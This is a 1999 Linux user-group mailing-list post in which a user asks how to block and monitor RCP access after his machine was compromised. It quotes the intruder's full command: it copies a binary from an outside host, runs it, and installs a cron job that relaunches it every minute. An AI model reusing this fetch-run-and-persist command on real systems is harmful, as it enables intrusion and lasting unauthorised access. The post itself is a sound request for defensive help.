[OLUG] RCP

Todd buster18 at home.com
Tue Dec 14 17:06:20 UTC 1999

	Can anyone tell me how to stop RCP access to my Linux box, and if there are
any security tools available to monitor a RCP connection.  On December 11
someone gained access and perfomed the following to my machine:
rcp tcstewar at 129.97.50.62:.../lin /usr/sbin/rpc.listen ; chmod +x
/usr/sbin/rpc.listen; /usr/sbin/rpc.listen ; echo \* \* \* \* \*
/usr/sbin/rpc.listen > cron ; crontab cron ; exit ;
	I currently am running logwatch and uwatch, but this connection did not
show up in either.  	Any suggestions would be welcomed.